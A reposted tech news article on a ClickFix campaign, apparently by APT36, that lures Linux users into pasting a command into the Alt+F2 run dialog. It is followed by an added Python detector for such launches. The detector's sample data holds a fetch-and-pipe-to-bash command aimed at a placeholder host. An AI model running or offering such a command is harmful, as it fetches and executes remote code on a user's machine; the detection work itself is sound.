New ClickFix campaign spotted hitting both Windows and Linux machines
Date:
Tue, 13 May 2025 12:30:00 +0000
Description:
ClickFix is evolving once again and this time, it's targeting Linux, too.
FULL STORY ======================================================================
Researchers from Hunt.io saw a Linux-based ClickFix attack
At the moment, it is still harmless
The researchers believe a Pakistani threat actor is behind the attacks
ClickFix, a type of attack that tricks people into running console commands
to download malware, thinking they're fixing a problem, is evolving once again.
This time, cybersecurity researchers from Hunt.io said they spotted the
attack targeting Linux devices, as well.
Originally, ClickFix was designed for Windows devices but has, at some point, expanded into macOS, as well. Linux was, for the most part, spared. Until
now.
ClickFix strikes Linux
ClickFix works in a simple way - a website is compromised and used to show a popup. That popup usually tells the visitor that they need to update their browser to view the content, or pass a CAPTCHA test to confirm that they're human.
That update or verification process requires the user to copy a command to
the clipboard, bring up the Run program (on Windows), paste and run it. It
may sound like a stretch, but it's relatively successful, since many cybersecurity companies have been warning about new ClickFix campaigns emerging left and right.
Hunt.io has attributed this newest string of attacks to a Pakistani threat actor called APT36, or Transparent Tribe. It uses a fake Ministry of Defense of India website, containing a link to a fake press release. When a victim tries to navigate to the press release, the site analyzes their OS, and then redirects them to the corresponding attack flow.
For Linux, the victims are redirected to a CAPTCHA page that copies a shell command when they click the "I'm not a robot" button. They are then asked to press ALT+F2 to bring up the Linux run dialog, and paste and run the command.
The good news is that the attack was spotted while still in an experimental phase, meaning it hasn't caused any significant damage, yet. Apparently, all the shell command does is download a harmless JPEG file. Things could turn sour at any point, however.
"No additional activity, such as persistence mechanisms, lateral movement, or outbound communication, was observed during execution," the researchers explained.
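One way a defender could look for the Linux flow described above in process-execution telemetry, as an added example that is not from the article or from Hunt.io: flag download tools whose parent process is the desktop run dialog. The event fields, the parent-process names and the sample events are assumptions constructed for illustration.

```python
import re

# Assumption: process names that own the desktop run dialog (Alt+F2) on
# GNOME, KDE Plasma and Xfce. Adjust to the desktops in your fleet.
RUN_DIALOG_PARENTS = {"gnome-shell", "krunner", "xfce4-appfinder"}
DOWNLOADERS = {"curl", "wget"}
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(\S*/)?(sh|bash|dash|zsh)\b")

def words(cmdline):
    """Basenames of every word, also inside a quoted `sh -c "..."` string."""
    parts = re.split(r"[\s\"'|;&()<>`$]+", cmdline)
    return [p.rsplit("/", 1)[-1].lower() for p in parts if p]

def reasons_for(event):
    """Return the reasons an exec event looks like a pasted ClickFix command."""
    fetchers = DOWNLOADERS.intersection(words(event["cmdline"]))
    if event["parent"] not in RUN_DIALOG_PARENTS or not fetchers:
        return []
    reasons = ["%s started from run dialog (%s)"
               % ("/".join(sorted(fetchers)), event["parent"])]
    if PIPE_TO_SHELL.search(event["cmdline"]):
        reasons.append("download piped into a shell")
    return reasons

def detect(events):
    """Return (event, reasons) pairs for every flagged event."""
    hits = []
    for event in events:
        reasons = reasons_for(event)
        if reasons:
            hits.append((event, reasons))
    return hits

# Constructed sample events (hypothetical field names, not real telemetry).
SAMPLE_EVENTS = [
    {"user": "alice", "parent": "gnome-shell",
     "cmdline": 'sh -c "curl -s -o /tmp/image.jpg https://example.invalid/image.jpg"'},
    {"user": "bob", "parent": "krunner",
     "cmdline": "wget -qO- https://example.invalid/s | bash"},
    {"user": "carol", "parent": "bash",  # typed in a terminal: not flagged
     "cmdline": "curl -O https://example.invalid/release.tar.gz"},
    {"user": "dave", "parent": "gnome-shell",  # normal app launch
     "cmdline": "/usr/bin/firefox"},
]

if __name__ == "__main__":
    for event, reasons in detect(SAMPLE_EVENTS):
        print(event["user"], event["cmdline"], "->", "; ".join(reasons))
```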
Via BleepingComputer
======================================================================
Link to news story:
https://www.techradar.com/pro/security/new-clickfix-campaign-spotted-hitting-both-windows-and-linux-machines
--- Mystic BBS v1.12 A47 (Linux/64)
* Origin: tqwNet Technology News (1337:1/100)